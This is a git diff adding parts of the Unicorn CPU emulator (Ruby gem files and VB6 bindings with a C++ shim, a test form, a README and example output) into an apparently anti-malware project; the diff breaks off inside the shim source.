1224 + UC_X86_INS_VPSUBW = 1225 + UC_X86_INS_VPTESTMD = 1226 + UC_X86_INS_VPTESTMQ = 1227 + UC_X86_INS_VPTESTNMD = 1228 + UC_X86_INS_VPTESTNMQ = 1229 + UC_X86_INS_VPTEST = 1230 + UC_X86_INS_VPUNPCKHBW = 1231 + UC_X86_INS_VPUNPCKHDQ = 1232 + UC_X86_INS_VPUNPCKHQDQ = 1233 + UC_X86_INS_VPUNPCKHWD = 1234 + UC_X86_INS_VPUNPCKLBW = 1235 + UC_X86_INS_VPUNPCKLDQ = 1236 + UC_X86_INS_VPUNPCKLQDQ = 1237 + UC_X86_INS_VPUNPCKLWD = 1238 + UC_X86_INS_VPXORD = 1239 + UC_X86_INS_VPXORQ = 1240 + UC_X86_INS_VPXOR = 1241 + UC_X86_INS_VRCP14PD = 1242 + UC_X86_INS_VRCP14PS = 1243 + UC_X86_INS_VRCP14SD = 1244 + UC_X86_INS_VRCP14SS = 1245 + UC_X86_INS_VRCP28PD = 1246 + 
UC_X86_INS_VRCP28PS = 1247 + UC_X86_INS_VRCP28SD = 1248 + UC_X86_INS_VRCP28SS = 1249 + UC_X86_INS_VRCPPS = 1250 + UC_X86_INS_VRCPSS = 1251 + UC_X86_INS_VRNDSCALEPD = 1252 + UC_X86_INS_VRNDSCALEPS = 1253 + UC_X86_INS_VRNDSCALESD = 1254 + UC_X86_INS_VRNDSCALESS = 1255 + UC_X86_INS_VROUNDPD = 1256 + UC_X86_INS_VROUNDPS = 1257 + UC_X86_INS_VROUNDSD = 1258 + UC_X86_INS_VROUNDSS = 1259 + UC_X86_INS_VRSQRT14PD = 1260 + UC_X86_INS_VRSQRT14PS = 1261 + UC_X86_INS_VRSQRT14SD = 1262 + UC_X86_INS_VRSQRT14SS = 1263 + UC_X86_INS_VRSQRT28PD = 1264 + UC_X86_INS_VRSQRT28PS = 1265 + UC_X86_INS_VRSQRT28SD = 1266 + UC_X86_INS_VRSQRT28SS = 1267 + UC_X86_INS_VRSQRTPS = 1268 + UC_X86_INS_VRSQRTSS = 1269 + UC_X86_INS_VSCATTERDPD = 1270 + UC_X86_INS_VSCATTERDPS = 1271 + UC_X86_INS_VSCATTERPF0DPD = 1272 + UC_X86_INS_VSCATTERPF0DPS = 1273 + UC_X86_INS_VSCATTERPF0QPD = 1274 + UC_X86_INS_VSCATTERPF0QPS = 1275 + UC_X86_INS_VSCATTERPF1DPD = 1276 + UC_X86_INS_VSCATTERPF1DPS = 1277 + UC_X86_INS_VSCATTERPF1QPD = 1278 + UC_X86_INS_VSCATTERPF1QPS = 1279 + UC_X86_INS_VSCATTERQPD = 1280 + UC_X86_INS_VSCATTERQPS = 1281 + UC_X86_INS_VSHUFPD = 1282 + UC_X86_INS_VSHUFPS = 1283 + UC_X86_INS_VSQRTPD = 1284 + UC_X86_INS_VSQRTPS = 1285 + UC_X86_INS_VSQRTSD = 1286 + UC_X86_INS_VSQRTSS = 1287 + UC_X86_INS_VSTMXCSR = 1288 + UC_X86_INS_VSUBPD = 1289 + UC_X86_INS_VSUBPS = 1290 + UC_X86_INS_VSUBSD = 1291 + UC_X86_INS_VSUBSS = 1292 + UC_X86_INS_VTESTPD = 1293 + UC_X86_INS_VTESTPS = 1294 + UC_X86_INS_VUNPCKHPD = 1295 + UC_X86_INS_VUNPCKHPS = 1296 + UC_X86_INS_VUNPCKLPD = 1297 + UC_X86_INS_VUNPCKLPS = 1298 + UC_X86_INS_VZEROALL = 1299 + UC_X86_INS_VZEROUPPER = 1300 + UC_X86_INS_WAIT = 1301 + UC_X86_INS_WBINVD = 1302 + UC_X86_INS_WRFSBASE = 1303 + UC_X86_INS_WRGSBASE = 1304 + UC_X86_INS_WRMSR = 1305 + UC_X86_INS_XABORT = 1306 + UC_X86_INS_XACQUIRE = 1307 + UC_X86_INS_XBEGIN = 1308 + UC_X86_INS_XCHG = 1309 + UC_X86_INS_XCRYPTCBC = 1310 + UC_X86_INS_XCRYPTCFB = 1311 + UC_X86_INS_XCRYPTCTR = 1312 + UC_X86_INS_XCRYPTECB = 
1313 + UC_X86_INS_XCRYPTOFB = 1314 + UC_X86_INS_XEND = 1315 + UC_X86_INS_XGETBV = 1316 + UC_X86_INS_XLATB = 1317 + UC_X86_INS_XRELEASE = 1318 + UC_X86_INS_XRSTOR = 1319 + UC_X86_INS_XRSTOR64 = 1320 + UC_X86_INS_XRSTORS = 1321 + UC_X86_INS_XRSTORS64 = 1322 + UC_X86_INS_XSAVE = 1323 + UC_X86_INS_XSAVE64 = 1324 + UC_X86_INS_XSAVEC = 1325 + UC_X86_INS_XSAVEC64 = 1326 + UC_X86_INS_XSAVEOPT = 1327 + UC_X86_INS_XSAVEOPT64 = 1328 + UC_X86_INS_XSAVES = 1329 + UC_X86_INS_XSAVES64 = 1330 + UC_X86_INS_XSETBV = 1331 + UC_X86_INS_XSHA1 = 1332 + UC_X86_INS_XSHA256 = 1333 + UC_X86_INS_XSTORE = 1334 + UC_X86_INS_XTEST = 1335 + UC_X86_INS_FDISI8087_NOP = 1336 + UC_X86_INS_FENI8087_NOP = 1337 + UC_X86_INS_ENDING = 1338 +end \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/pkg/.gitignore b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/pkg/.gitignore new file mode 100644 index 0000000..b7e7725 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/pkg/.gitignore @@ -0,0 +1,10 @@ +/.bundle/ +/.yardoc +/Gemfile.lock +/_yardoc/ +/coverage/ +/doc/ +/pkg/ +/spec/reports/ +/tmp/ +*.gem diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/unicorn-engine.gemspec b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/unicorn-engine.gemspec new file mode 100644 index 0000000..3c91c48 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/unicorn-engine.gemspec @@ -0,0 +1,21 @@ +# coding: utf-8 +lib = File.expand_path('../lib', __FILE__) +$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib) +require 'unicorn_engine/version' + +Gem::Specification.new do |spec| + spec.name = "unicorn-engine" + spec.version = Unicorn::VERSION + spec.authors = ["Sascha Schirra"] + spec.email = ["sashs@scoding.de"] + spec.license = 'GPL-2.0' + spec.summary = %q{Ruby binding for Unicorn-Engine} + spec.description = %q{Ruby binding for 
Unicorn-Engine <unicorn-engine.org>} + spec.homepage = "https://unicorn-engine.org" + + spec.files = Dir["lib/unicorn_engine/*.rb"] + Dir["ext/unicorn.c"] + Dir["ext/unicorn.h"] + Dir["ext/types.h"] + Dir["ext/extconf.rb"] + spec.require_paths = ["lib","ext"] + spec.extensions = ["ext/extconf.rb"] + spec.add_development_dependency "bundler", "~> 1.11" + spec.add_development_dependency "rake", "~> 10.0" +end diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/.gitattributes b/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/.gitattributes new file mode 100644 index 0000000..6101291 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/.gitattributes @@ -0,0 +1,11 @@ +*.frm eol=crlf +*.bas eol=crlf +*.cls eol=crlf +*.ctl eol=crlf +*.vbp eol=crlf +*.txt eol=crlf +*.cpp eol=crlf +*.tli eol=crlf +*.tlh eol=crlf +*.vcproj eol=crlf +*.sln eol=crlf diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/CMemRegion.cls b/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/CMemRegion.cls new file mode 100644 index 0000000..bb2085f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/CMemRegion.cls @@ -0,0 +1,50 @@ +VERSION 1.0 CLASS +BEGIN + MultiUse = -1 'True + Persistable = 0 'NotPersistable + DataBindingBehavior = 0 'vbNone + DataSourceBehavior = 0 'vbNone + MTSTransactionMode = 0 'NotAnMTSObject +END +Attribute VB_Name = "CMemRegion" +Attribute VB_GlobalNameSpace = False +Attribute VB_Creatable = True +Attribute VB_PredeclaredId = False +Attribute VB_Exposed = False +'this is for 32bit address space.. 
+Public address As Long +Public size As Long +Public endsAt As Long +Public perm As Long + +Function toString() As String + toString = "Addr: " & Hex(address) & " Size: " & Hex(size) & " Perm: " & permToString() & " (" & Hex(perm) & ")" +End Function + +'Public Enum uc_prot +' UC_PROT_NONE = 0 +' UC_PROT_READ = 1 +' UC_PROT_WRITE = 2 +' UC_PROT_EXEC = 4 +' UC_PROT_ALL = 7 +'End Enum + +Function permToString() As String + + If perm = 7 Then + permToString = "All" + Exit Function + End If + + If perm = 0 Then + permToString = "None" + Exit Function + End If + + If (perm And 1) = 1 Then permToString = "Read " + If (perm And 2) = 2 Then permToString = permToString & "Write " + If (perm And 4) = 4 Then permToString = permToString & "Exec" + + permToString = Trim(permToString) + +End Function diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/Form1.frm b/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/Form1.frm new file mode 100644 index 0000000..d3fa033 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/Form1.frm @@ -0,0 +1,256 @@ +VERSION 5.00 +Begin VB.Form Form1 + Caption = "Form1" + ClientHeight = 6720 + ClientLeft = 60 + ClientTop = 345 + ClientWidth = 14220 + LinkTopic = "Form1" + ScaleHeight = 6720 + ScaleWidth = 14220 + StartUpPosition = 2 'CenterScreen + Begin VB.CommandButton Command1 + Caption = "Copy" + Height = 465 + Left = 6180 + TabIndex = 1 + Top = 6150 + Width = 1995 + End + Begin VB.ListBox List1 + BeginProperty Font + Name = "Courier New" + Size = 11.25 + Charset = 0 + Weight = 400 + Underline = 0 'False + Italic = 0 'False + Strikethrough = 0 'False + EndProperty + Height = 5925 + Left = 150 + TabIndex = 0 + Top = 120 + Width = 13965 + End +End +Attribute VB_Name = "Form1" +Attribute VB_GlobalNameSpace = False +Attribute VB_Creatable = False +Attribute VB_PredeclaredId = True +Attribute VB_Exposed = False +Option Explicit + +'Contributed by: FireEye FLARE team +'Author: David Zimmer <david.zimmer@fireeye.com>, 
<dzzie@yahoo.com> +'License: Apache + +Public WithEvents uc As ucIntel32 +Attribute uc.VB_VarHelpID = -1 +Dim hContext As Long + + +'test sample ported from: (requires unicorn 1.0 for success) +' https://github.com/unicorn-engine/unicorn/blob/master/tests/unit/test_pc_change.c +' https://github.com/unicorn-engine/unicorn/issues/210 + +Private Sub Form_Load() + + Dim ecx As Long, edx As Long + Dim address As Long, size As Long, endAt As Long + Dim b() As Byte, c As Collection, mem As CMemRegion + + Me.Visible = True + + 'you can set UNICORN_PATH global variable to load a specific dll, do this before initilizing the class + Set uc = New ucIntel32 + + If uc.hadErr Then + List1.AddItem uc.errMsg + Exit Sub + End If + + List1.AddItem "ucvbshim.dll loaded @" & Hex(uc.hLib) + List1.AddItem "Unicorn version: " & uc.Version + List1.AddItem "Disassembler available: " & uc.DisasmAvail + If uc.major < 1 Then List1.AddItem "Change Eip in hook test requires >= v1.x for success" + + List1.AddItem "Unicorn x86 32bit engine handle: " & Hex(uc.uc) + +' ReDim b(8) 'for clarity in what we are testing.. 
+' b(0) = &H41 ' inc ECX @0x1000000 +' b(1) = &H41 ' inc ECX +' b(2) = &H41 ' inc ECX +' b(3) = &H41 ' inc ECX @0x1000003 +' b(4) = &H41 ' inc ECX +' b(5) = &H41 ' inc ECX +' +' b(6) = &H42 ' inc EDX @0x1000006 +' b(7) = &H42 ' inc EDX + +' #define X86_CODE32_MEM_WRITE "\x89\x0D\xAA\xAA\xAA\xAA\x41\x4a" // mov [0xaaaaaaaa], ecx; INC ecx; DEC edx + + 'we mash up two different test cases, first the change eip in hook test, then an invalid memory access + 'note the format accepted by tobytes() is somewhat forgiving (always use 2char hex vals though) + b() = toBytes("4141414141414242cc\x89\x0D\xAA\xAA\xAA\xAA\x41\x4a") + + ecx = 3 + edx = 15 + address = &H1000000 + size = &H200000 + endAt = address + UBound(b) + 1 + + If Not uc.mapMem(address, size) Then + List1.AddItem "Failed to map in 2mb memory " & uc.errMsg + Exit Sub + End If + + ' write machine code to be emulated to memory + If Not uc.writeMem(address, b()) Then + List1.AddItem "Failed to write code to memory " & uc.errMsg + Exit Sub + End If + + List1.AddItem "starts at: " & uc.disasm(address) + + Dim b2() As Byte + If uc.readMem(address, b2, UBound(b) + 1) Then '+1 because ubound is 0 based.. + List1.AddItem "readMem: " & HexDump(b2, 1) + End If + + uc.reg32(ecx_r) = ecx + uc.reg32(edx_r) = edx + List1.AddItem "start values ECX = " & ecx & " EDX = " & edx + + ' trace all instructions + uc.addHook hc_code, UC_HOOK_CODE + uc.addHook hc_memInvalid, UC_HOOK_MEM_READ_UNMAPPED Or UC_HOOK_MEM_WRITE_UNMAPPED + 'uc.removeHook UC_HOOK_MEM_READ_UNMAPPED Or UC_HOOK_MEM_WRITE_UNMAPPED + uc.addHook hc_int, UC_HOOK_INTR + + List1.AddItem "beginning emulation.." + If Not uc.startEmu(address, endAt) Then List1.AddItem uc.errMsg + + ecx = uc.reg32(ecx_r) + edx = uc.reg8(dl_r) + + List1.AddItem "ECX: 6 =? " & ecx + List1.AddItem "EDX: 17 =? " & edx + List1.AddItem uc.dumpFlags + If ecx <> 6 Then List1.AddItem "failed to change eip in hook!" + + ReDim b(100) 'this will handle mapping and alignment automatically.. 
+ uc.writeBlock &H2001, b(), UC_PROT_READ Or UC_PROT_WRITE + + List1.AddItem "Initilizing sharedMemory with: aabbccddeeff0011223344556677889900" + sharedMemory() = toBytes("aabbccddeeff0011223344556677889900") + ReDim Preserve sharedMemory(&H1000) 'must be 4k bytes aligned... + + If Not uc.mapMemPtr(sharedMemory, &H4000, UBound(sharedMemory)) Then + List1.AddItem "Failed to map in host memory " & uc.errMsg + Else + + Dim bb As Byte, ii As Integer, ll As Long + + If Not uc.writeByte(&H4001, &H41) Then + List1.AddItem "Failed to write byte to shared mem" + Else + List1.AddItem "Wrote 0x41 to sharedMemory + 1" + If uc.readByte(&H4001, bb) Then List1.AddItem "readByte = " & Hex(bb) + End If + + 'uc.writeInt &H4001, &H4142 + 'If uc.readInt(&H4001, ii) Then List1.AddItem Hex(ii) + + 'uc.writeLong &H4001, &H11223344 + 'If uc.readLong(&H4001, ll) Then List1.AddItem Hex(ll) + + Erase b2 + If uc.readMem(&H4000, b2, 20) Then + List1.AddItem "emu read of sharedMemory: " & HexDump(b2, 1) + Else + List1.AddItem "Failed to readMem on sharedMemory " & uc.errMsg + End If + + List1.AddItem "sanity checking host mem: " & HexDump(sharedMemory, 1, , 20) + + End If + + List1.AddItem "Enumerating memory regions..." + + Set c = uc.getMemMap() + + For Each mem In c + List1.AddItem mem.toString() + Next + + If hContext <> 0 Then + List1.AddItem "trying to restore context.." + If Not uc.restoreContext(hContext) Then List1.AddItem uc.errMsg + List1.AddItem uc.regDump() + List1.AddItem "beginning emulation.." + If Not uc.startEmu(uc.eip, endAt) Then List1.AddItem uc.errMsg + List1.AddItem uc.regDump() + List1.AddItem "releasing saved context.." + If Not uc.freeContext(hContext) Then List1.AddItem uc.errMsg + End If + + Set mem = c(2) + If Not uc.changePermissions(mem, UC_PROT_ALL) Then + List1.AddItem "Failed to change permissions on second alloc " & uc.errMsg + Else + List1.AddItem "Changed permissions on second alloc to ALL" + List1.AddItem "redumping memory regions to check..." 
+ Set c = uc.getMemMap() + For Each mem In c + List1.AddItem mem.toString() + Next + End If + + If uc.unMapMem(&H2000) Then + List1.AddItem "Successfully unmapped new alloc" + Else + List1.AddItem "Failed to unmap alloc " & uc.errMsg + End If + + List1.AddItem "Mem allocs count now: " & uc.getMemMap().count + +End Sub + +Private Sub Command1_Click() + Clipboard.Clear + Clipboard.SetText lbCopy(List1) +End Sub + +Private Sub Form_Unload(Cancel As Integer) + 'so IDE doesnt hang onto dll and we can recompile in development testing.. if you hit stop this benefit is lost.. + 'do not use this in your real code, only for c dll development.. + If uc.hLib <> 0 Then FreeLibrary uc.hLib +End Sub + +Private Sub uc_CodeHook(ByVal address As Long, ByVal size As Long) + + List1.AddItem "> " & uc.disasm(address) + + If hContext = 0 And address = &H1000003 Then 'change the PC to "inc EDX" + List1.AddItem "changing eip to skip last inc ecx's and saving context..." + hContext = uc.saveContext() + If hContext = 0 Then List1.AddItem "Failed to save context " & uc.errMsg + uc.eip = &H1000006 + End If + +End Sub + +Private Sub uc_Interrupt(ByVal intno As Long) + List1.AddItem "Interrupt: " & intno +End Sub + +Private Sub uc_InvalidMem(ByVal t As uc_mem_type, ByVal address As Long, ByVal size As Long, ByVal value As Long, continue As Boolean) + 'continue defaults to false so we can ignore it unless we want to continue.. 
+ List1.AddItem "Invalid mem access address: " & Hex(address) & " size: " & Hex(size) & " type: " & memType2str(t) +End Sub + +Private Sub uc_MemAccess(ByVal t As uc_mem_type, ByVal address As Long, ByVal size As Long, ByVal value As Long) + List1.AddItem "mem access: address: " & Hex(address) & " size: " & Hex(size) & " type: " & memType2str(t) +End Sub + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/Project1.vbp b/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/Project1.vbp new file mode 100644 index 0000000..31ab39f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/Project1.vbp @@ -0,0 +1,42 @@ +Type=Exe +Form=Form1.frm +Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\WINDOWS\system32\stdole2.tlb#OLE Automation +Module=uc_def; uc_def.bas +Module=misc; misc.bas +Class=ucIntel32; ucIntel32.cls +Class=CMemRegion; CMemRegion.cls +IconForm="Form1" +Startup="Form1" +HelpFile="" +ExeName32="vb6Test.exe" +Command32="" +Name="Project1" +HelpContextID="0" +CompatibleMode="0" +MajorVer=1 +MinorVer=0 +RevisionVer=0 +AutoIncrementVer=0 +ServerSupportFiles=0 +VersionCompanyName="sandsprite" +CompilationType=0 +OptimizationType=0 +FavorPentiumPro(tm)=0 +CodeViewDebugInfo=-1 +NoAliasing=0 +BoundsCheck=0 +OverflowCheck=0 +FlPointCheck=0 +FDIVCheck=0 +UnroundedFP=0 +StartMode=0 +Unattended=0 +Retained=0 +ThreadPerObject=0 +MaxNumberOfThreads=1 + +[MS Transaction Server] +AutoRefresh=1 + +[fastBuild] +fullPath=%ap%\vb6Test.exe diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/README.txt b/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/README.txt new file mode 100644 index 0000000..bb607d7 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/README.txt @@ -0,0 +1,71 @@ + +Unicorn engine bindings for VB6 + +A sample class for the 32bit x86 emulator is provided. 
+ +Contributed by: FireEye FLARE team +Author: David Zimmer <david.zimmer@fireeye.com>, <dzzie@yahoo.com> +License: Apache + +' supported api: +' ucs_version +' ucs_arch_supported +' ucs_open +' ucs_close +' uc_reg_write +' uc_reg_read +' uc_mem_write +' UC_MEM_READ +' uc_emu_start +' uc_emu_stop +' ucs_hook_add +' uc_mem_map +' uc_hook_del +' uc_mem_regions +' uc_mem_map_ptr +' uc_context_alloc +' uc_free +' uc_context_save +' uc_context_restore +' uc_mem_unmap +' uc_mem_protect +' uc_strerror +' uc_errno +' +' supported hooks: +' UC_HOOK_CODE +' UC_HOOK_BLOCK +' memory READ/WRITE/FETCH +' invalid memory access +' interrupts +' +' bonus: +' disasm_addr (conditional compile - uses libdasm) +' mem_write_block (map and write data auto handles alignment) +' get_memMap (wrapper for uc_mem_regions) +' + +dependancies: (all in same directory or unicorn package in %windir%) + vb6Test.exe + ucvbshim.dll _ + unicorn.dll - + libgcc_s_dw2-1.dll \ + libiconv-2.dll \__ unicorn package + libintl-8.dll / + libpcre-1.dll / + libwinpthread-1.dll_- + +Notes: + + c dll was built using VS2008 + build notes are included at the top of main.c + this dll serves as a stdcall shim so vb6 can access the cdecl api and receive data from the callbacks. + + huge thanks to the unicorn and qemu authors who took on a gigantic task to create this library! + + + + + + + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/example_output.txt b/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/example_output.txt new file mode 100644 index 0000000..c57c426 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/example_output.txt @@ -0,0 +1,54 @@ +ucvbshim.dll loaded @10000000 +Unicorn version: 1.0 +Disassembler available: True +Unicorn x86 32bit engine handle: 853FD8 +starts at: 01000000 41 inc ecx +readMem: 4141414141414242CC890DAAAAAAAA414A +start values ECX = 3 EDX = 15 +beginning emulation.. 
+> 01000000 41 inc ecx +> 01000001 41 inc ecx +> 01000002 41 inc ecx +> 01000003 41 inc ecx +changing eip to skip last inc ecx's and saving context... +> 01000006 42 inc edx +> 01000007 42 inc edx +> 01000008 CC int3 +Interrupt: 3 +> 01000009 89 0D AA AA AA AA mov [0xaaaaaaaa],ecx +Invalid mem access address: AAAAAAAA size: 4 type: Unmapped memory is written to +Quit emulation due to WRITE on unmapped memory: uc_emu_start() +ECX: 6 =? 6 +EDX: 17 =? 17 +EFL 4 P +Initilizing sharedMemory with: aabbccddeeff0011223344556677889900 +Wrote 0x41 to sharedMemory + 1 +readByte = 41 +emu read of sharedMemory: AA41CCDDEEFF0011223344556677889900000000 +sanity checking host mem: AA41CCDDEEFF0011223344556677889900000000 +Enumerating memory regions... +Addr: 1000000 Size: 200000 Perm: All (7) +Addr: 2000 Size: 1000 Perm: Read Write (3) +Addr: 4000 Size: 1000 Perm: All (7) +trying to restore context.. +eax=0 ecx=6 edx=F ebx=0 esp=0 ebp=0 esi=0 edi=0 eip=1000003 eflags=0 EFL 0 +beginning emulation.. +> 01000003 41 inc ecx +> 01000004 41 inc ecx +> 01000005 41 inc ecx +> 01000006 42 inc edx +> 01000007 42 inc edx +> 01000008 CC int3 +Interrupt: 3 +> 01000009 89 0D AA AA AA AA mov [0xaaaaaaaa],ecx +Invalid mem access address: AAAAAAAA size: 4 type: Unmapped memory is written to +Quit emulation due to WRITE on unmapped memory: uc_emu_start() +eax=0 ecx=9 edx=11 ebx=0 esp=0 ebp=0 esi=0 edi=0 eip=1000009 eflags=4 EFL 4 P +releasing saved context.. +Changed permissions on second alloc to ALL +redumping memory regions to check... 
+Addr: 1000000 Size: 200000 Perm: All (7) +Addr: 2000 Size: 1000 Perm: All (7) +Addr: 4000 Size: 1000 Perm: All (7) +Successfully unmapped new alloc +Mem allocs count now: 2 diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/main.cpp b/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/main.cpp new file mode 100644 index 0000000..725136f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/main.cpp @@ -0,0 +1,459 @@ + +/* + stdcall unicorn engine shim layer for use with VB6 or C# + code ripped from unicorn_dynload.c + + Contributed by: FireEye FLARE team + Author: David Zimmer <david.zimmer@fireeye.com>, <dzzie@yahoo.com> + License: Apache + + Disassembler support can be optionally compiled in using: + libdasm (c) 2004 - 2006 jt / nologin.org + + this project has been built with vs2008 + + precompiled binaries with disasm support available here: + https://github.com/dzzie/libs/tree/master/unicorn_emu + +*/ + +#include <io.h> +#include <windows.h> + +#ifdef _WIN64 +#error vb6 is 32bit only +#endif + +#include <unicorn/unicorn.h> +#pragma comment(lib, "unicorn.lib") + +//if you compile with VS2008 you will need to add stdint.h and inttypes.h to your compiler include directory +//you can find examples here: https://github.com/dzzie/VS_LIBEMU/tree/master/libemu/include + +//if you want to include disassembler support: +// 1) install libdasm in your compilers include directory +// 2) add libdasm.h/.c to the project (drag and drop into VS project explorer), +// 3) remove the comment from the define below. +//The vb code detects the changes at runtime. 
+//#define INCLUDE_DISASM + +#ifdef INCLUDE_DISASM +#include <libdasm/libdasm.h> +#endif + + +#include "msvbvm60.tlh" //so we can use the vb6 collection object + +#define EXPORT comment(linker, "/EXPORT:"__FUNCTION__"="__FUNCDNAME__) + + +enum hookCatagory{hc_code = 0, hc_block = 1, hc_inst = 2, hc_int = 3, hc_mem = 4, hc_memInvalid = 5}; + +//tracing UC_HOOK_CODE & UC_HOOK_BLOCK +typedef void (__stdcall *vb_cb_hookcode_t) (uc_engine *uc, uint64_t address, uint32_t size, void *user_data); +vb_cb_hookcode_t vbHookcode = 0; +vb_cb_hookcode_t vbHookBlock = 0; + +//hooking memory UC_MEM_READ/WRITE/FETCH +typedef void (__stdcall *vb_cb_hookmem_t) (uc_engine *uc, uc_mem_type type, uint64_t address, int size,int64_t value, void *user_data); +vb_cb_hookmem_t vbHookMem = 0; + +//invalid memory access UC_MEM_*_UNMAPPED and UC_MEM_*PROT events +typedef bool (__stdcall *vb_cb_eventmem_t) (uc_engine *uc, uc_mem_type type, uint64_t address, int size, int64_t value, void *user_data); +vb_cb_eventmem_t vbInvalidMem = 0; + +//tracing interrupts for uc_hook_intr() +typedef void (__stdcall *vb_cb_hookintr_t) (uc_engine *uc, uint32_t intno, void *user_data); +vb_cb_hookintr_t vbHookInt = 0; + +/* +typedef uint32_t (__stdcall *uc_cb_insn_in_t)(uc_engine *uc, uint32_t port, int size, void *user_data); tracing IN instruction of X86 +typedef void (__stdcall *uc_cb_insn_out_t) (uc_engine *uc, uint32_t port, int size, uint32_t value, void *user_data); tracing OUT instruction of X86 +*/ + +//------------------ [ call back proxies ] ------------------------- +static void c_hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) +{ + if(vbHookcode==0) return; + vbHookcode(uc,address,size,user_data); +} + +static void c_hook_mem(uc_engine *uc, uc_mem_type type,uint64_t address, int size, int64_t value, void *user_data) +{ + if(vbHookMem==0) return; + vbHookMem(uc,type,address,size,value,user_data); +} + +static bool c_hook_mem_invalid(uc_engine *uc, uc_mem_type type, uint64_t 
address, int size, int64_t value, void *user_data) +{ + if(vbInvalidMem==0) return false; + return vbInvalidMem(uc,type,address,size,value,user_data); +} + + +static void c_hook_block(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) +{ + if(vbHookBlock==0) return; + vbHookBlock(uc,address,size,user_data); +} + +static void c_hook_intr(uc_engine *uc, uint32_t intno, void *user_data) +{ + if(vbHookInt==0) return; + vbHookInt(uc,intno,user_data); +} + + +/* +static uint32_t hook_in(uc_engine *uc, uint32_t port, int size, void *user_data) +{ +} + +static void hook_out(uc_engine *uc, uint32_t port, int size, uint32_t value, void *user_data) +{ +} +*/ + +//------------------------------------------------------------- + +//uc_err uc_hook_add(uc_engine *uc, uc_hook *hh, int type, void *callback, void *user_data, uint64_t begin, uint64_t end, ...); +//we need to use a C stub cdecl callback then proxy to the stdcall vb one.. +//we could get cute with an asm thunk in vb but not worth complexity there are only a couple of them to support.. +//cdecl callback to vb stdcall callback for tracing +uc_err __stdcall ucs_hook_add(uc_engine *uc, uc_hook *hh, int type, void *callback, void *user_data, uint64_t begin, uint64_t end, int catagory, int instr_id){ +#pragma EXPORT + + if(catagory == hc_code){ + if(vbHookcode == 0){ + if((int)callback==0) return UC_ERR_FETCH_UNMAPPED; + vbHookcode = (vb_cb_hookcode_t)callback; + } + return uc_hook_add(uc,hh,type,c_hook_code,user_data,begin,end); + } + + if(catagory == hc_block){ + if(vbHookBlock == 0){ + if((int)callback==0) return UC_ERR_FETCH_UNMAPPED; + vbHookBlock = (vb_cb_hookcode_t)callback; + } + return uc_hook_add(uc,hh,type,c_hook_block,user_data,begin,end); + } + + if(catagory == hc_mem){ //then it is some combination of memory access hook flags.. 
+ if(vbHookMem == 0){ + if((int)callback==0) return UC_ERR_FETCH_UNMAPPED; + vbHookMem = (vb_cb_hookmem_t)callback; + } + return uc_hook_add(uc,hh,type,c_hook_mem,user_data,begin,end); + } + + if(catagory == hc_memInvalid){ //then it is some combination of invalid memory access hook flags.. + if(vbInvalidMem == 0){ + if((int)callback==0) return UC_ERR_FETCH_UNMAPPED; + vbInvalidMem = (vb_cb_eventmem_t)callback; + } + return uc_hook_add(uc,hh,type,c_hook_mem_invalid,user_data,begin,end); + } + + if(catagory == hc_int){ + if(vbHookInt == 0){ + if((int)callback==0) return UC_ERR_FETCH_UNMAPPED; + vbHookInt = (vb_cb_hookintr_t)callback; + } + return uc_hook_add(uc,hh,UC_HOOK_INTR,c_hook_intr,user_data,begin,end); + } + + return UC_ERR_ARG; +} + +unsigned int __stdcall ucs_dynload(char *path){ +#pragma EXPORT + /*#ifdef DYNLOAD + return uc_dyn_load(path, 0); + #else*/ + return 1; + //#endif +} + +unsigned int __stdcall ucs_version(unsigned int *major, unsigned int *minor){ +#pragma EXPORT + return uc_version(major, minor); +} + +bool __stdcall ucs_arch_supported(uc_arch arch){ +#pragma EXPORT + return uc_arch_supported(arch); +} + +uc_err __stdcall ucs_open(uc_arch arch, uc_mode mode, uc_engine **uc){ +#pragma EXPORT + return uc_open(arch, mode, uc); +} + +uc_err __stdcall ucs_close(uc_engine *uc){ +#pragma EXPORT + return uc_close(uc); +} + +uc_err __stdcall ucs_query(uc_engine *uc, uc_query_type type, size_t *result){ +#pragma EXPORT + return uc_query(uc, type, result); +} + +uc_err __stdcall ucs_errno(uc_engine *uc){ +#pragma EXPORT + return uc_errno(uc); +} + +const char *__stdcall ucs_strerror(uc_err code){ +#pragma EXPORT + return uc_strerror(code); +} + +uc_err __stdcall ucs_reg_write(uc_engine *uc, int regid, const void *value){ +#pragma EXPORT + return uc_reg_write(uc, regid, value); +} + +uc_err __stdcall ucs_reg_read(uc_engine *uc, int regid, void *value){ +#pragma EXPORT + return uc_reg_read(uc, regid, value); +} + +uc_err __stdcall 
